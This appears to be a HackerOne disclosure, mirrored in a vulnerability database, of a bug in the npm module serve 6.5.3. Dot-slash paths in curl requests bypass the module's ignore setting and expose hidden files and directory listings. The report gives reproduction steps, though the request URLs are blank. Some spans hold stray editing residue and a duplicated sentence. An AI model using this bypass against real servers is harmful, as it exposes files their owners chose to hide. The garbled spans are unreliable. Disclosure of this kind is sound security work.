Node.js third-party modules: [serve] Directory listing and File access even when they have been set to be ignored (using dot-slash)

ID H1:330724
Type hackerone
Reporter tungpun
Modified 2018-05-30T13:04:31


I would like to report a vulnerability in serve. It allows listing directory and reading local files on the target server.


module name: serve
version: 6.5.3
npm page:

Module Description

Ever wanted to share a project on your network by running just a command? Then this module is exactly what you're looking for: It provides a neat interface for listing the directory's contents and switching into sub folders.

In addition, it's also awesome when it comes to serving static sites!


Steps To Reproduce:

  • Install serve:

$ npm i serve

  • Create some child directories, files for demonstration:

$ mkdir dir

$ echo "This is secret content!!" > dir/secret.txt

$ mkdir dir/dir2

$ touch dir/dir2/3.txt

  • Create an application that uses serve for file serving and listing, and set a few folders and files in the ignore config (app.js):

const serve = require('serve')
const server = serve(__dirname, { port: 6060, ignore: ['dir/secret.txt', 'dir/dir2'] })

  • Run the app

$ node app.js

Now the current directory is served by this module on port 6060, except for the file dir/secret.txt and the directory dir/dir2.

  • If we try to request these ignored files/directories, we get a Not Found error:
</gra_replace>
<gr_replace lines="53" cat="clarify" orig="or if we replace">
or, if we replace the e character with its URI-encoded form %65, it is still ignored:

$ curl --path-as-is '' Not Found

$ curl --path-as-is '' Not Found

or if we replace e character with URI encoded form %65, it still be ignored:

$ curl --path-as-is '' Not Found

  • However, I found a way to access that file by using dot-slash.

$ curl --path-as-is '' This is secret content!!

Or listing the directory:


Supporting Material/References:

  • macOS High Sierra 10.13.3
  • node v8.10.0
  • npm 5.8.0
  • Chrome Version 65.0.3325.162 (Official Build) (64-bit)

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N


It bypasses the ignore files/directories feature and allows an attacker to read a file or list a directory that the victim has not allowed access to.